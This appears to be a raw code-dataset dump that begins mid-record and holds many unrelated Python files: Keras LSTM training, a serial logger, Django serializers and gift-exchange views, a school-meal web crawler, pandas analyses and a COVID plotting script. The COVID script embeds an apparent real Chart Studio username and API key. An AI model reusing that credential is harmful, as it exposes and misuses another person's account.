sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nimport matplotlib.pyplot as plt\nfrom ALutils import Calculate_Score,RANK\nnp.random.seed(1377)\n\n\n# ### Prepare the data\n\n# In[2]:\n\ntrain = pd.read_csv('../Data/train.csv')\nftest = pd.read_csv('../Data/test.csv')\n#ftest[ftest.columns[[0]+[i for i in range(10,18)]]]\n#train.head()\ndef GetData(ds):#, splitper=0.2): Splitter is stopped \n np.random.seed(1337)\n #Convert The Percentage to split point\n splitper = 50 #int(math.floor(splitper * ds.shape[0] + 1))\n\n #Shuffle the list\n #Shuffle is stopped so we can get stable measurements\n #ds = ds.iloc[np.random.permutation(len(ds))]\n \n #Get tarin,test\n ls = [i for i in range(10,18)]\n ls+=[0,2]\n x_train = ds.iloc[splitper:][np.delete(ds.columns, ls)]\n y_train = ds.iloc[splitper:][ds.columns[10:18]]\n x_test = ds.iloc[:splitper][np.delete(ds.columns, ls)]\n y_test = ds.iloc[:splitper][ds.columns[10:18]]\n return (x_train.as_matrix(),y_train.as_matrix()),(x_test.as_matrix(),y_test.as_matrix()) \n\n\n# In[3]:\n\n#1-inf\nbatch_size = 1\n#1-inf\nnb_epoch = 1000\n#Done\n#SGD, RMSprop, Adagrad, Adadelta, Adam, Adamax\ntheoptimizer = 'adam'\n#DONE\n#1-inf\nlayernodes = 128\n#DONE\n#0.1-0.9\nthedropout =0.5\n#DONE\n#softmax,softplus,relu,tanh,sigmoid,hard_sigmoid,linear,\nFirstActivation = 'relu'\nSecondActivation='sigmoid'\n#DONE\n#mean_squared_error / mse,root_mean_squared_error / rmse,mean_absolute_error / mae,mean_absolute_percentage_error / mape\n#mean_squared_logarithmic_error / msle,squared_hinge, hinge,binary_crossentropy: Also known as logloss,categorical_crossentropy: Also known as multiclass logloss. Note: using this objective requires that your labels are binary arrays of shape (nb_samples, nb_classes).\n#poisson: mean of (predictions - targets * log(predictions))# cosine_proximity: the opposite (negative) of the mean cosine proximity between predictions and targets.\ntheloss='mse'\n#======================\nprint('Loading data...')\n\n#(X_train, y_train), (X_test, y_test) =GetData()\n(x_train,y_train),(x_test,y_test) = GetData(train)\n#y_train = y_train[:,0]\n#y_test = y_test[:,0]\nprint('train:',x_train.shape,y_train.shape)\nprint('test: ',x_test.shape,y_test.shape)\n\nx_train = np.reshape(x_train,(x_train.shape[0],1,x_train.shape[1]))\nx_test = np.reshape(x_test,(x_test.shape[0],1,x_test.shape[1]))\nmodel = Sequential() \nmodel.add(LSTM(300,input_shape=(1,24),return_sequences=True,dropout_W=0.2)) \nmodel.add(LSTM(200,return_sequences=True,dropout_W=0.2)) \nmodel.add(LSTM(100,return_sequences=False,dropout_W=0.2)) \nmodel.add(Dense(50,init='normal')) \nmodel.add(Dense(8,init='normal')) \nmodel.add(Activation(\"linear\")) \nmodel.compile(loss=\"mean_squared_error\", optimizer=\"rmsprop\") \n\n\n# In[5]:\n\nearly_stopping = EarlyStopping(monitor='val_loss', patience=42)\nmodel_checkpoint = ModelCheckpoint('output_files/Model_LSTM_{epoch:02d}-{val_loss:.2f}.h5', monitor='val_loss', verbose=0, save_best_only=True, save_weights_only=False, mode='min')\nhistory = model.fit(x_train, y_train, nb_epoch=nb_epoch,callbacks=[early_stopping, model_checkpoint], batch_size=batch_size,verbose=1, validation_split=0.1)\n\n# In[6]:\n\norg = RANK(y_test)\nprint('Perfect Score:',Calculate_Score(org,org))\n#bm = load_model('output_files/t0/Model_01-106548.69.h5')\n#model = load_model('output_files/Model_NN:2_67-0.12.h5')\npred = model.predict(x_test)\npred = RANK(pred)\nprint('Current Score:',Calculate_Score(pred,org))\n","sub_path":"AQEEL_MODELS/LSTM2.py","file_name":"LSTM2.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"232043140","text":"print(\"HERE\")\nimport serial\nprint(\"HERE\")\nimport csv\nimport sys\nimport glob\n\n\n#def enum_ports():\n#\tports = ['COM%s' % (i + 1) for i in range(256)]\n#\n#\tresult = []\n#\tfor port in ports:\n#\t\ttry:\n#\t\t\ts = serial.Serial(port)\n#\t\t\ts.close()\n#\t\t\tresult.append(port)\n#\t\texcept (OSError, serial.SerialException):\n#\t\t\tpass\n#\treturn result\n\nprint(\"HERE\")\n\n#### COM Setup #########################################################################\nCOMPORT = 22\t\nBAUDRATE = 256000\n#COM_PORT = int(input(\"Enter COM port Number: \"))\n#print(\"\\n\\r\\n\\r\")\n#print(\"Available ports:\")\n#print(enum_ports())\n#print(\"\\n\\n\\r\")\n\nprint(\"HERE\")\n#try:\ncom = serial.Serial(port=(COMPORT-1),baudrate=BAUDRATE,timeout = 0.01)\nprint (\"Connection started on %s\\n at %s kbps\"\n\t\t \"----------------------------------------------------------------------\\n\"%(com.name, BAUDRATE/1000))\n#except:\n#\tprint(\"CONNECTION FAILED. EXITING...\")\n#\tsys.exit(0)\n### COM Setup END #####################################################################\n\n#Packet\n# C-interp \tuint16_t voltage, uint16_t current, char range, \"\\n\"\n# Py-Interp\tchar, char, char, char, char, '\\n'\nprint(\"HERE\")\nTXSIZE = 200\nresultsArray = []\ncom.readline()\nfor i in range(0,TXSIZE):\n\tprint(\"HERE\")\n\tresultsArray.append(list(com.readline()))\t# Read lines until transmit period is over\n\nwith open(\"loggingFile.csv\", 'a', newline='') as file:\n\tprint(\"HERE\")\n\tfor j in resultsArray:\n\t\toutput = csv.writer(file)\n\t\toutput.writerow([ ord(j[0])<<8+ord(j[1]) , ord(j[2])<<8+ord(j[3]) , j[4] ])\n\t\tfile.close()","sub_path":"Python/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"587139526","text":"#coding=cp936\nimport os\nimport shutil\nimport win32api\n\n\ndef getFileVersion(file_name):\n info = win32api.GetFileVersionInfo(file_name, os.sep)\n ms = info['FileVersionMS']\n ls = info['FileVersionLS']\n version = '%d.%d.%d.%d' % (win32api.HIWORD(ms), win32api.LOWORD(ms), win32api.HIWORD(ls), win32api.LOWORD(ls))\n return version\n\nif not os.path.exists('UpxApp'):\n os.makedirs('UpxApp')\nshutil.copy('UniEntity.exe','UpxApp/UniEntity.exe')\nos.system('upx -9 UpxApp/UniEntity.exe')\nos.chdir('UpxApp')\n\n\n#os.system('rar a -df UpxApp/SqlSrv/PRMS UpxApp/SqlSrv/PRMS.exe');\n#os.system('rar a UpxApp/SqlSrv/PRMS UpxApp/SqlSrv/PRMS.exe');\nrarcmd='rar a UniEntity_V%s.rar UniEntity.exe' % getFileVersion('UniEntity.exe')\nos.system(rarcmd)\n","sub_path":"2012_06_19_15_45_32_D7有关UniEntity的开发/UpxIt.py","file_name":"UpxIt.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92176044","text":"# -*- coding: utf-8 -*-\n\nimport urllib\nimport hashlib\nimport re\nimport time\n\ndef urlquote(s):\n\treturn urllib.quote(s)\n\t\ndef deepmerge(target,source):\n\tfor k in target :\n\t\tif k in source:\n\t\t\tif isinstance( target[k] ,dict ):\n\t\t\t\tif isinstance( source[k] , dict ):\n\t\t\t\t\tdeepmerge(target[k],source[k])\n\t\t\t\telse:\n\t\t\t\t\ttarget[k] = source[k]\n\t\t\telse:\n\t\t\t\ttarget[k] = source[k]\n\ndef md5sum(s):\n\tm = hashlib.md5()\n\tm.update(s)\n\treturn m.hexdigest()\n\ndef toInt(s,default=None):\n\tif isinstance(s,(int,long)):\n\t\treturn s\n\tif isinstance(s,str):\n\t\tre_num = r'^-?[0-9]*$'\n\t\treg = re.compile(re_num)\n\t\tif reg.match(s):\n\t\t\treturn int(s)\n\t\telse:\n\t\t\treturn default\n\ndef isInt(v):\n\treturn isinstance(v,(int,long))\n\ndef timeStamp2Str(t):\n\treturn time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(t))\n\ndef timeStamp2Short(t):\n\tnow = time.localtime()\n\tsti = time.localtime(t)\n\t\n\tif now.tm_year != sti.tm_year:\n\t\treturn time.strftime('%Y-%m-%d',sti)\n\telif now.tm_mon != sti.tm_mon or now.tm_mday != sti.tm_mday:\n\t\treturn time.strftime('%m月%d日',sti)\n\telse:\n\t\treturn time.strftime('%H:%M',sti)\n","sub_path":"drape/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381570372","text":"import re\n\nfrom django.contrib.auth.models import User, Group\nfrom rest_framework import serializers\nfrom rest_framework.reverse import reverse\n\nfrom workatolist.models import Channel, Category\n\n\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = User\n fields = ('url', 'username', 'email', 'groups')\n\n\nclass GroupSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Group\n fields = ('url', 'name')\n\n\nclass ChannelSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = Channel\n fields = ('url', 'name', 'slug')\n extra_kwargs = {\n 'url': {'view_name': 'channel-detail', 'lookup_field': 'slug'},\n }\n\n\nclass CategorySlugRelatedField(serializers.SlugRelatedField):\n\n def to_internal_value(self, value):\n assert isinstance(value, str), \\\n \"value is not a string: {0}\".format(value)\n m = re.search(r\"/(?P[\\w-]+)/$\", value)\n if m:\n the_category = Category.objects.filter(\n slug=m.groupdict()['slug']).first()\n return the_category\n elif value:\n the_category = Category.objects.filter(slug=value).first()\n if the_category:\n return the_category\n else:\n return None\n\n def to_representation(self, value):\n if value:\n request = self.context['request']\n url = reverse(\n 'category-detail', args=[value.slug], request=request)\n return url\n return None\n\n\nclass ChannelSlugRelatedField(serializers.SlugRelatedField):\n\n def to_internal_value(self, value):\n assert isinstance(value, str), \\\n \"value is not a string: {0}\".format(value)\n m = re.search(r\"/(?P[\\w-]+)/$\", value)\n if m:\n the_channel = Channel.objects.filter(\n slug=m.groupdict()['slug']).first()\n return the_channel\n elif value:\n the_channel = Channel.objects.filter(slug=value).first()\n if the_channel:\n return the_channel\n else:\n return None\n\n def to_representation(self, value):\n if value.slug:\n request = self.context['request']\n url = reverse(\n 'channel-detail', args=[value.slug], request=request)\n return url\n return None\n\n\nclass SubCategory(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ('slug', 'name')\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n url = serializers.SerializerMethodField('category_url')\n parent = CategorySlugRelatedField(\n many=False,\n read_only=False,\n slug_field='slug',\n queryset=Category.objects.all(),\n required=False,\n allow_null=True,\n )\n channel = ChannelSlugRelatedField(\n many=False,\n read_only=False,\n slug_field='slug',\n queryset=Channel.objects.all(),\n # source='channel.id',\n )\n\n def category_url(self, instance):\n request = self.context['request']\n return reverse(\n 'category-detail', args=[instance.slug], request=request)\n\n class Meta:\n model = Category\n fields = ('url', 'slug', 'name', 'channel', 'parent')\n","sub_path":"work-at-olist/workatolist/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265658228","text":"import codecademylib\nimport pandas as pd\n\nad_clicks = pd.read_csv('ad_clicks.csv')\nprint(ad_clicks.head(10))\n\nviews_source = ad_clicks.groupby(['utm_source']).user_id.count().reset_index()\nprint(views_source)\n\nad_clicks['is_click'] = ~ad_clicks.ad_click_timestamp.isnull()\n\nclicks_by_source = ad_clicks.groupby(['utm_source','is_click']).user_id.count().reset_index()\nprint(clicks_by_source)\n\nclicks_pivot = clicks_by_source.pivot(index='utm_source',columns='is_click',values='user_id').reset_index()\nprint(clicks_pivot)\n\nclicks_pivot['percent_clicked'] = clicks_pivot[True]/(clicks_pivot[True]+clicks_pivot[False])\nprint(clicks_pivot)\n\nexperimental_group_count = ad_clicks.groupby(['experimental_group']).user_id.count().reset_index()\nprint(experimental_group_count)\n\nclicks_by_experimental = ad_clicks.groupby(['experimental_group','is_click']).user_id.count().reset_index()\nprint(clicks_by_experimental)\n\nclicks_by_experimental_pivot = clicks_by_experimental.pivot(index='experimental_group',columns='is_click',values='user_id').reset_index()\n\nclicks_by_experimental_pivot['percent_clicked'] = clicks_by_experimental_pivot[True]/(clicks_by_experimental_pivot[True]+clicks_by_experimental_pivot[False])\nprint(clicks_by_experimental_pivot)\n\na_clicks = ad_clicks[ad_clicks.experimental_group == 'A'].reset_index()\nb_clicks = ad_clicks[ad_clicks.experimental_group == 'B'].reset_index()\n\na_clicks_count = a_clicks.groupby(['is_click','day']).user_id.count().reset_index()\na_clicks_pivot = a_clicks_count.pivot(index='day',columns='is_click',values='user_id').reset_index()\na_clicks_pivot['percent_clicked'] = a_clicks_pivot[True]/(a_clicks_pivot[True]+a_clicks_pivot[False])\nprint(a_clicks_pivot)\n\nb_clicks_count = b_clicks.groupby(['is_click','day']).user_id.count().reset_index()\nb_clicks_pivot = b_clicks_count.pivot(index='day',columns='is_click',values='user_id').reset_index()\nb_clicks_pivot['percent_clicked'] = b_clicks_pivot[True]/(b_clicks_pivot[True]+b_clicks_pivot[False])\nprint(b_clicks_pivot)","sub_path":"pandas/aggregates_in_pandas.py","file_name":"aggregates_in_pandas.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"220657023","text":"#Exercise 5: Write a program to read through the mail box data and when you find line that starts with \"From\", you will split the line into words using the split function. We are interested in who sent the message, which is the second word on the From line.\n#From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008\n#You will parse the From line and print out the second word for each From line, then you will also count the number of From (not From:) lines and print out a count at the end.\n\nfname=input(\"Enter name of file\")\nfopen=open(fname)\ncount=0\nfor letter in fopen:\n if letter.startswith(\"From\") :\n count=count+1\n split=letter.split()\n print(split[1])\nprint(count)\n","sub_path":"list3.py","file_name":"list3.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"105294933","text":"# -*- coding: utf-8 -*-\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\n\nimport json, time, datetime\nfrom datetime import date\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# GET ~/keyboard/ 요청에 반응\ndef keyboard(request):\n return JsonResponse({\n 'type': 'buttons',\n 'buttons': ['조식', '중식', '석식', '내일의 조식', '내일의 중식', '내일의 석식']\n })\n\n# csrf 토큰 에러 방지, POST 요청에 message response\n@csrf_exempt\ndef message(request):\n json_str = ((request.body).decode('utf-8'))\n received_json_data = json.loads(json_str)\n meal = received_json_data['content']\n\n daystring = [\"월\", \"화\", \"수\", \"목\", \"금\", \"토\", \"일\"]\n today = datetime.datetime.today().weekday()\n\n nextdaystring = [\"화\", \"수\", \"목\", \"금\", \"토\", \"일\", \"월\"]\n\n today_date = datetime.date.today().strftime(\"%m월 %d일 \")\n tomorrow_date = date.fromtimestamp(time.time() + 60 * 60 * 24).strftime(\"%m월 %d일 \")\n\n if meal == '조식' or meal == '중식' or meal == '석식':\n return JsonResponse({\n 'message': {\n 'text': today_date + daystring[today] + '요일 ' + meal + ' 메뉴입니다. \\n \\n' + crawl(request)\n },\n 'keyboard': {\n 'type': 'buttons',\n 'buttons': ['조식', '중식', '석식', '내일의 조식', '내일의 중식', '내일의 석식']\n }\n })\n if meal == '내일의 조식' or meal == '내일의 중식' or meal == '내일의 석식':\n return JsonResponse({\n 'message': {\n 'text': '[' + meal + '] \\n' + tomorrow_date + nextdaystring[today] + '요일 급식 메뉴입니다. \\n \\n' + crawl(request)\n },\n 'keyboard': {\n 'type': 'buttons',\n 'buttons': ['조식', '중식', '석식', '내일의 조식', '내일의 중식', '내일의 석식']\n }\n })\n\n# message 요청 받을시 크롤링 실시\ndef crawl(request):\n import urllib.request\n from bs4 import BeautifulSoup\n\n json_str = ((request.body).decode('utf-8'))\n received_json_data = json.loads(json_str)\n meal = received_json_data['content']\n\n # 타학교에서 이용시 수정\n regioncode = 'gne.go.kr'\n schulcode = 'S100000747'\n\n if meal == '조식' or meal == '내일의 조식':\n sccode = 1\n if meal == '중식' or meal == '내일의 중식':\n sccode = 2\n if meal == '석식' or meal == '내일의 석식':\n sccode = 3\n\n # NEIS에서 파싱\n url = ('http://stu.' + regioncode + '/sts_sci_md01_001.do?schulCode=' + schulcode + '&schulCrseScCode=4&schulKndScCode=04&schMmealScCode=' + str(sccode))\n\n try:\n source = urllib.request.urlopen(url, timeout=3)\n except Exception as e:\n logger.error(e)\n menu = '급식 정보를 가져오는 중 문제가 발생하였습니다.\\n관리자에게 연락바랍니다.'\n else:\n # beautifulsoup4를 이용해 utf-8, lxml으로 파싱\n soup = BeautifulSoup(source, \"lxml\", from_encoding='utf-8')\n\n # div_id=\"contents\"안의 table을 모두 검색 후 td태그만 추출\n table_div = soup.find(id=\"contents\")\n tables = table_div.find_all(\"table\")\n menu_table = tables[0]\n td = menu_table.find_all('td')\n\n # 요일 import, 월요일 ~ 일요일 = 0~6\n today = datetime.datetime.today().weekday()\n\n # 월요일 ~ 일요일 = td[8] ~ td[14]\n if meal == '조식' or meal == '중식' or meal == '석식':\n if today == 6:\n menu = '일요일'\n else:\n menu = td[today + 8]\n\n if meal == '내일의 조식' or meal == '내일의 중식' or meal == '내일의 석식':\n if today == 5:\n menu = '일요일'\n elif today == 6:\n menu = td[8]\n else:\n menu = td[today + 9]\n\n # 파싱 후 불필요한 태그 잔해물 제거\n menu = str(menu).replace('*', '').replace('', '').replace('', '').replace('class=\"textC last\">', '').replace('class=\"textC\">', '').replace('
', '\\n').replace('1.', '').replace('2.', '').replace('3.', '').replace('4.', '').replace('5.', '').replace('6.', '').replace('7.', '').replace('8.', '').replace('9.', '').replace('10.', '').replace('11.', '').replace('12.', '').replace('13.', '').replace('14.', '').replace('15.', '').replace('1', '').replace(' ', '')\n\n if menu == '':\n menu = '급식 정보가 존재하지 않습니다.\\n급식이 없는 날일 수 있으니 확인 바랍니다.'\n\n if menu == '일요일':\n menu = '일요일은 급식이 제공되지 않습니다.'\n\n return menu","sub_path":"hyoammeal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167932600","text":"import logging\nimport copy\nimport random\nimport itertools\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\nfrom annoying.decorators import render_to\n\nfrom webapp.apps.exchange.forms import ExchangeForm, UserExchangeForm, UserExchangeExclusionForm\nfrom webapp.apps.exchange.models import Exchange, UserExchangeExclusion\n\nlogger = logging.getLogger(__name__)\n\n@render_to('exchange/list.html')\n@login_required\ndef exchange_list(request):\n user_exchanges = request.user.userexchange_set.all()\n return {'user_exchanges': user_exchanges}\n\n\n@render_to('exchange/create.html')\n@login_required\ndef create(request):\n\n if request.method == 'POST':\n form = ExchangeForm(request.POST)\n\n if form.is_valid():\n exchange = form.save(user=request.user)\n return redirect('exchange-list')\n else :\n form = ExchangeForm()\n\n return {'form': form}\n\n\n@render_to('exchange/edit.html')\n@login_required\ndef edit(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n\n if request.method == 'POST':\n form = ExchangeForm(request.POST, instance=exchange)\n\n if form.is_valid():\n exchange = form.save(user=request.user)\n return redirect('exchange-list')\n else :\n form = ExchangeForm(instance=exchange)\n\n user_exchanges = exchange.userexchange_set.all()\n user_exchange_exclusions = UserExchangeExclusion.objects.filter(exchange=exchange)\n\n return {\n 'form': form,\n 'exchange': exchange,\n 'user_exchanges': user_exchanges,\n 'user_exchange_exclusions': user_exchange_exclusions\n }\n\n\n@login_required\ndef start(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n\n if request.method == 'POST':\n\n user_exchanges = exchange.userexchange_set.all()\n user_exchange_exclusions = UserExchangeExclusion.objects.filter(exchange=exchange)\n\n all = copy.deepcopy(list(user_exchanges))\n targets = copy.deepcopy(all)\n random.shuffle(targets)\n\n target_permutations = itertools.permutations(targets)\n found = False\n i = 0\n for permutation in target_permutations:\n i = i + 1\n if validate(all, permutation, user_exchange_exclusions):\n for person, target in zip(all, permutation):\n logger.info(\"%s -> %s\" % (person, target));\n person.target = target.user\n person.save()\n\n subject = exchange.name\n\n if exchange.state == Exchange.STARTED:\n subject = subject + \" - Re-generated\"\n\n if target.user.first_name and target.user.last_name:\n body = \"Get a gift for: %s %s (%s)\" % (target.user.first_name, target.user.last_name, target.user.email)\n else:\n body = \"Get a gift for: %s\" % target.user.email\n\n email_from = settings.EMAIL_FROM\n email_to = person.user.email\n send_mail(subject, body, email_from, [email_to], fail_silently=False)\n\n found = True\n break\n\n logger.info(\"Checked %d permutations\" % i)\n\n if not found:\n raise Exception(\"Can't start exchange, could not compute cycle\")\n\n exchange.state = Exchange.STARTED\n exchange.save()\n\n return redirect('exchange-list')\n\n else :\n return redirect('exchange-list')\n\n\ndef validate(all, targets, user_exchange_exclusions):\n for person, target in zip(all, targets):\n if person == target:\n return False\n for exclusion in user_exchange_exclusions:\n if person == exclusion.user_exchange1 and target == exclusion.user_exchange2:\n return False\n return True\n\n\n@login_required\ndef delete(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n exchange.delete()\n\n return redirect('exchange-list')\n\n\n@render_to('exchange/user/create.html')\n@login_required\ndef create_user_exchange(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n\n if request.method == 'POST':\n form = UserExchangeForm(request.POST)\n\n if form.is_valid():\n user_exchange = form.save(exchange=exchange)\n return redirect('exchange-edit', exchange.id)\n else :\n form = UserExchangeForm()\n\n return {'form': form, 'exchange': exchange}\n\n\n@render_to('exchange/user/exclusion/create.html')\n@login_required\ndef create_user_exchange_exclusion(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n user_exchanges = exchange.userexchange_set.all()\n\n if request.method == 'POST':\n form = UserExchangeExclusionForm(user_exchanges, request.POST)\n\n if form.is_valid():\n user_exchange_exclusion = form.save(exchange=exchange)\n return redirect('exchange-edit', exchange.id)\n else :\n form = UserExchangeExclusionForm(user_exchanges)\n\n return {'form': form, 'exchange': exchange}\n","sub_path":"webapp/apps/exchange/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"544116689","text":"import pandas as pd\nimport os\nimport sys\n\nhtml_template = \"\"\"\n\n\n \n \n \n \n \n \n \n \n \n
\n {table}\n
\n \n\n\"\"\"\n\nargs = sys.argv\n\nif len(args) ==2:\n print(\"第1引数:\" + args[1])\n current_dir = os.path.dirname(os.path.abspath(__file__))\n project_root_path = os.path.dirname(current_dir)\n test_data_parent_path = os.path.join(project_root_path, \"data\", args[1])\n print(test_data_parent_path)\n estimation_result_path = os.path.join(test_data_parent_path, \"estimation\")\n if os.path.exists(os.path.join(estimation_result_path, \"comparison.csv\")):\n print('比較用csvデータあり')\n else:\n print('比較用csvデータなし')\n quit()\nelse:\n print('以下形式でテスト対象フォルダを指定してください')\n print('$ python html_convert.py ')\n quit()\n\npd.set_option(\"display.max_colwidth\", 120)\ndf = pd.read_csv(os.path.join(estimation_result_path, \"comparison.csv\"))\n\n# imgタグの文字列へ変換\ndf[\"img_path\"] = df[\"img_path\"].map(lambda s: \"\".format(s))\ndf[\"estimation_pixels\"] = df[\"estimation_pixels\"].map(lambda s: \"\".format(s))\ndf[\"correct_pixels\"] = df[\"correct_pixels\"].map(lambda s: \"\".format(s))\ndf[\"roi\"] = df[\"roi\"].map(lambda s: \"\".format(s))\ntable = df.to_html(classes=[\"table\", \"table-bordered\", \"table-hover\"], escape=False)\nhtml = html_template.format(table=table)\n\nwith open(\"test.html\", \"w\") as f:\n f.write(html)","sub_path":"tool/html_convert.py","file_name":"html_convert.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"533876175","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport plotly.io as pio\nimport chart_studio\nimport chart_studio.plotly as py\nchart_studio.tools.set_credentials_file(username='daniel.reiff', api_key='jhEpBS6888O1FEbZI8M4')\n\n\nclass World(object):\n\n def __init__(self, df):\n self.df = df\n self.transpose_df()\n\n def transpose_df(self):\n countryAgg = self.df.drop(columns=['Lat', 'Long']).groupby('Country/Region').sum().reset_index()\n self.df = countryAgg.set_index('Country/Region').stack().reset_index(level=1).reset_index().rename(columns={'level_1': 'Date', 0:'Confirmed'})\n\n def _addCountry(self, country, fig, i):\n df = self.df[self.df['Country/Region'] == country]\n df['NewCases'] = df.Confirmed.diff()\n df = df.fillna(0)\n df['NewCasesInLastWeek'] = df['NewCases'].rolling(7).sum()\n df = df.fillna(0)\n df[\"Date\"] = df[\"Date\"].apply(lambda x: x.replace(\"/20\", \"\"))\n fig.add_trace(go.Scatter(x=np.log(df['Confirmed']), y=np.log(df['NewCasesInLastWeek']), text=df['Date'], mode='lines+markers', name=country), row=1, col=2)\n fig.add_trace(go.Scatter(x=df[\"Date\"], y=df[\"Confirmed\"], text=df['Date'], mode='lines+markers', name=country), row=i+1, col=1)\n if country == 'Korea, South':\n fig.add_trace(go.Scatter(x= np.log(df[df['Date'] == '3/4'][\"Confirmed\"]), y = np.log(df[df['Date'] == '3/4'][\"NewCasesInLastWeek\"]), name=\"Inflection Point\"), row=1, col=2)\n fig.add_trace(go.Scatter(x= df[df['Date'] == '3/4']['Date'], y = df[df['Date'] == '3/4'][\"Confirmed\"], name=\"Inflection Point\"), row=2, col=1)\n\n def plotCountries(self, countries, filename):\n titles = [\"{} Logistic Curve\".format(country) for country in countries]\n titles.insert(1, \"Existing Cases vs. New Cases\")\n fig = make_subplots(\n rows=3, cols=2,\n specs=[[{}, {\"rowspan\":3}],\n [{}, None],\n [{}, None]],\n subplot_titles=titles)\n\n for i, country in enumerate(countries):\n # print(i)\n self._addCountry(country, fig, i)\n fig.update_layout(\n title=\"Coronavirus in Countries: Confirmed Growth\",\n xaxis_title=\"Log(Confirmed Cases)\",\n yaxis_title=\"Log(Total New Cases in Last Week)\",\n )\n\n py.iplot(fig, filename = filename)\n\n\n\nif __name__ == '__main__':\n df = pd.read_csv('../local_data/time_series_covid19_confirmed_global.csv')\n comparison = World(df)\n comparison.plotCountries([\"US\", \"Korea, South\", \"Italy\"], filename)\n","sub_path":"src/World_Coronavirus_Analysis.py","file_name":"World_Coronavirus_Analysis.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99714793","text":"#https://leetcode.com/problems/word-ladder/discuss/473774/python-two-end-solution-100ms\nfrom typing import List\nfrom collections import defaultdict\nimport sys\n\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nfrom collections import defaultdict\nimport time\n\n\n\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n def is_range(matrix, i, j):\n N = len(matrix)\n M = len(matrix[0])\n if i < 0 or i >= N: return False\n if j < 0 or j >= M: return False\n return True\n\n def validate(matrix, h, w, length):\n for n in range(length):\n for m in range(length):\n i, j = h + n, w + m\n if matrix[i][j] != 1:\n return False\n return True\n\n def get_max_square(matrix, x, y):\n counter = 0\n i, j = x, y\n while is_range(matrix, i, j) and matrix[i][j] == 1:\n if validate(matrix, x, y, counter):\n counter += 1\n i += 1\n j += 1\n return counter ** 2\n\n def solve(matrix: List[List[int]]) -> int:\n N = len(matrix)\n if N == 0: return 0\n M = len(matrix[0])\n maxi = 0\n for i in range(N):\n for j in range(M):\n local = get_max_square(matrix, i, j)\n maxi = max(local, maxi)\n return maxi\n matrix2 = [list(map(int, row)) for row in matrix]\n return solve(matrix2)\n\n\n\nsamples = [\n (\n [1, 0, 1, 0, 0],\n [1, 0, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 0, 0, 1, 0],\n )\n\n]\nfor S in samples:\n ans = Solution().maximalSquare(S)\n print(ans)\n","sub_path":"lc/mdm/20200204_mdm_221_maximal_square.py","file_name":"20200204_mdm_221_maximal_square.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"391287097","text":"import numpy as np\nimport pandas as pd\nfrom math import log\n#import os\n\ndef meb(x, a, b, c):\n # return the membership of PL,PM,PS,AZ,NS,NM,NL\n # x is return , a, b, c is the boundary of the membership\n if x <= a:\n return 0.0\n if (x > a) and (x <= b):\n return (x-a)/(b-a)\n if (x > b) and (x <= c):\n return (c-x)/(c-b)\n if x > c:\n return 0.0\n if a == b:\n if x <= b:\n return 1.0\n if (x > b) and (x <= c):\n return(c-x)/(c-b)\n if x > c:\n return 0.0\n if b == c:\n if x <= a:\n return 0.0\n if (x > a) and (x <= b):\n return (x-a)/(b-a)\n if x > b:\n return 1.0\n\ndef init(context):\n logger.info(\"init\")\n context.s1 = \"002032.XSHE\"\n #if instruments(context.s1).days_from_listed(date=None)<366:\n #os._exit()\n update_universe(context.s1)\n # 是否已发送了order\n context.fired = False\n context.P = np.matrix('10 0;0 10')\n context.c=0.01\n 